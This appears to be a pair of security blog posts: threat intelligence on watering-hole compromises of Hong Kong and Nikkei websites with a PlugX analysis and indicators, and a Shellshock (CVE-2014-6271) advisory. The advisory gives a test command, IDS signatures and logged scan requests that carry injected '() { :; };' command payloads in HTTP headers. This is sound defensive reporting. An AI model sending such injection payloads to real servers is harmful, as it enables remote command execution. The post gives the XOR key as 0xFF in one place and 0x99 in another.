The URL in question points to:

hXXp://www.hotel365.co.kr/Lnk/tw/index.html

This link does not work and will redirect a visitor back to the main page of the website. There does not appear to be any reason for the Professional Commmons website to have a hidden iFrame link randomly placed in the middle of its HTML code. It is suspected that this was a formerly active exploit URL. If it is actually malicious, it is possible the code could be re-activated at any time. Volexity recommend the URL and the Professional Commons website be browsed with caution.

High Profile Compromised Japanese Website

The Japanese Nikkei

In early September, the APT group behind java-se.com raised its visibility on Volexity’s radar following a compromise that effectively impacted many components of the Japanese Nikkei. In the first week of September, a subdomain used to load JavaScript code and additional files onto other Nikkei web properties such as www.nikkei.com and asia.nikkei.com was compromised. In particular a JavaScript file loaded from parts.nikkei.com was modified to reference another JavaScript file from jre76.java-se.com hosted on the Japanese IP address 211.125.81.203.

7506 | 211.125.80.0/22 | INTERQ | JP | GMO.JP | GMO INTERNET INC.

The code has since been taken down. However, in early September the JavaScript was pre-pended to the file http://parts.nikkei.com/parts/SC/s_cDS.js as seen in the screen shot below.

parts-nikkei-src

Like the JavaScript from the ATD and DPHK websites, Volexity was never actually able to obtain a live copy of this script. Each request results in an HTTP 403 response from the server. Volexity suspects the code was either active at select times and/or was only served to a subset of visitors. The code has not been observed on the s_cDS.js file for nearly a month now.

Live Exploits, Stolen Certificates, and Signed Malware

While tracking this APT activity, Volexity has also come across other seemingly unrelated compromises of websites in Hong Kong and Japan associated with the java-se.com activity. Despite several sites being compromised, the above activity tied to java-se.com did not result in the successful capture of actual exploit code or malware. However, research into other websites and activity involving java-se.com did lead Volexity to live exploits and malware. In particular Volexity came across live exploit code hosted at  jdk-7u12-windows-i586.java-se.com on the Japanese IP address 210.253.96.200.

7506 | 210.253.96.0/20 | INTERQ | JP | GMO.JP | GMO INTERNET INC.

This system hosted a JavaScript file, which in turned loads a malicious Java Applet. In testing the the Java Applet pops up a notification to the user asking them if they want to run the applet. Volexity has not had enough time to thoroughly analyze the file to see if it is an actual exploit or if the attackers rely on user assisted malware installation. The pop-up does make it appear as if the file is an update to Java. The popup displayed by Java is displayed below.

jre-update-WindySoft

As can be seen in the image above, this popup could be misconstrued by a user as an update to Java despite the java-se.com domain and the Publisher being listed as WindySoft. Interestingly the Java Archive being loaded is digitally signed by a certificate issued to WindySoft, an online gaming company from South Korea. We cannot confirm this certificate actually belonged to WindySoft at any point in time, however, there is fairly established precedent of certificates from online gaming companies being used to digitally sign malware and attack tools.

 

PlugX Strikes Again – Digitally Signed & Using 163.com Blogs

As one might expect, choosing to press the Run button would be bad news for someone presented with this prompt. If one were to click Run from this prompt, it would result in the file css.jpg being download over an encrypted channel from a folder on https://elsa-jp.jp. Note that elsa-jp.jp is a website hosted on the same IP address jdk-7u12-windows-i586.java-se.com and is likely compromised. The file css.jpg is of course not a JPEG file, it is an executable that has been encoded with the single-byte XOR key 0xFF.

Filename: css.jpg
File size: 168776 bytes
MD5 hash: b3a9e6548fb3cc511096af4d68b2e745
SHA1 hash: 394703d1240ccd3aaeeef50c212313e3036741b1
Notes: Executable file downloaded by Java Applet that has been encoded with XOR 0x99

Taking a closer look at the resulting executable we have, it turns out it is a newer sample of PlugX. In this particular sample an interesting and notable string was observed:

C:\wocawocawoca\piao\Release\caca.pdb

Also of interest is that as observed from the Java Applet, the executable is also digitally signed by a certificate issued to “WindySoft.”

 digitally-signed-plugx

 

Upon execution the malware sample immediately does a DNS resolution for the following hostname:

jduhf873jdu7.blog.163.com

The PlugX sample connects to the blog and parses the page for a command for where to connect to next. This is very similar to the method described by FireEye in their blog on Operation Poisoned Hurricane. The primary difference being that the attackers opted to use a 163.com Blog over a Google Code page to embed the command. Taking a closer look at the Blog page the following post is observed:

plugx-jduh-blog

The primary string to focus on is in the title of the post: DZKSCAAAAJPBBDHDDDOCCDFDFDOCCDBDHDOCHDHDDZJS

Using the same decoding routine describe by Cassidian in a PlugX post of theirs from earlier this year, we can see this command decodes to instruct the malware to connect to a U.S.-based Linode IP address at Hurricane Electric: 173.255.217.77.

6939 | 173.255.208.0/20 | HURRICANE | US | LINODE.COM | LINODE

A look at passive DNS identifies several hostnames that recently resolved to the IP address. The ones that still resolve to the IP are listed below:

dns.apasms.com
ns.gpass1.org
ns1.gpass1.org

These hostnames may be related but at the time of this writing we have not seen them in use in malware and are unable to confirm.

 

Conclusion

As we have seen for several years now, dissenting groups, especially those seeking increased levels of freedom frequently find themselves targeted for surveillance and information extraction. In the digital age, a strategic web compromise (exploit drive-by) has become a key weapon of choice for to conduct such operations. These types of attacks are far from overt, as a typical target and victim opted to go on their own to what they believe should be a safe and trusted website. In the case of this post, it appears that at least two different attackers were involved in compromising and placing malicious code on Pro-Democratic websites in Hong Kong. This is not the first time and surely will not be the last time that those in favor of democracy in Hong Kong will be targeted. Unfortunately with the level of access and infrastructure the attackers appear to have, this is quite an uphill battle. Continuing to expose these attack is one means that shines light on these attack operations with an aim at putting a dent in their success.

CVE-2014-6271 – Remotely Exploitable Vulnerability in Bash

With the excitement of public details of a remotely exploitable vulnerability in bash (CVE-2014-6271) coming to light today, we decided it was as good of time as any to finally launch Volexity’s blog. We have a lot of exciting announcements and posts coming, but for now we turn our attention to bash. Today’s announcement and release of related patches may ultimately unleash something that rivals HeartBleed. While that still remains to be seen, the time for action from system administrators is now.

Are You Vulnerable?

If you haven’t patched today, then the answer is most likely yes. However, double checking if this is the case is rather simple. If you want to find out if your version of bash is  vulnerable to exploitation, you can use a script that Redhat posted earlier today and quickly check.

$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"

A vulnerable version of bash will produce the following output:

vulnerable
this is a test

On the other hand, if your version of bash is patched or otherwise not affected, you will see this instead:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
this is a test

 

Thanks to coordinated efforts, at the time all of this information became public, patches were already available for most major Linux distributions. Simply getting updates from your repositories and performing an update to your whole system or only bash should do the trick. The Redhat post also contains a few other mitigations, which may be helpful if you can’t patch your version of bash for some reason.

Intrusion Detection

As of Wednesday evening there isn’t mass panic or wide spread exploitation of this issue. However, this is something that can change in an instant, as security researchers, enthusiast, criminals and nation-states are surely working to determine how else this can be further exploited. At the moment most POCs and testing centers around exploitation via HTTP requests to CGI scripts. As a result, taking a look at incoming HTTP requests and your HTTP logs may be a good way to kept abreast of active threats to your network and devices.

Volexity has tested and deployed a few simple signatures for two of the most common scenarios we have seen both suggested and in POC exploit code. These are simple IDS signatures aimed at catching an artifact not commonly seen in HTTP header traffic (this includes User-Agent or any other real or made up HTTP header). This test signature has been deployed across several networks with 0 false positives thus far. This doesn’t mean the exploit can’t be leveraged without triggering our signature, but rather, we are not seeing common web crawlers or other browsers and devices that flag on the rules. The signature in both Suricata and Snort formats is seen below.

Suricata Format

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex – Possible CVE-2014-6271 bash Vulnerability Requested (header)”; flow:established,to_server; content:”() {“; http_header;  threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;)

Snort Format

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”Volex – Possible CVE-2014-6271 bash Vulnerability Requested (header) “; flow:established,to_server; content:”() {“; http_header;  threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;)

 

If you think the rule looks extremely simplistic, you are 100% correct. We like to keep rules as simple as possible when getting them out in an emergency/immediate release. You will note the rule simply looks for “() {” in the HTTP header. These are what we have seen in tests and POCs thus far and hence the quick, dirty, and easy rule. Yes, there may ultimately be ways to evade this but it should be sufficient for now. With that said we have a working version that leverages pcre and will pick up several different variations that will evade the above two signatures. However, it is not quite ready for release, but if someone posts one before we release ours we will update this blog to include it. We recommend shipping it over to Emerging Threats for public inclusion.

Feel free to drop us a line if you have any feedback or questions.

 

Internet Scans

Update: 2014-09-24 21:10 ET

The first hits we have seen against our monitoring networks have come in and appear to be wide ranging scans from Errata Security from the IP address 209.126.230.72. The inbound requests look like the one below.

GET / HTTP/1.0
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
Accept: */*
Cookie: () { :; }; ping -c 17 209.126.230.74
Host:() { :; }; ping -c 23 209.126.230.74
Referer: () { :; }; ping -c 11 209.126.230.74

Check your network for outbound ICMP connections to 209.126.230.74. This is probably a good indicator you have a vulnerable server. More details of their scanning efforts are available right at the blog seen in the User-Agent string (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.htm). Taking a look now it also seems they have some information on early results of the scanning effort as well.

Update 2014-09-25 02:34 ET

A new wave of scanning is making its way around looking to try this attack against cPanel’s /cgi-sys/defaultwebpage.cgi file. Scans in these instance have come from the IP address 89.207.135.125. Sample HTTP request seen below:

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This will attempt to send a single ping to the Rackspace IP address 198.101.206.138.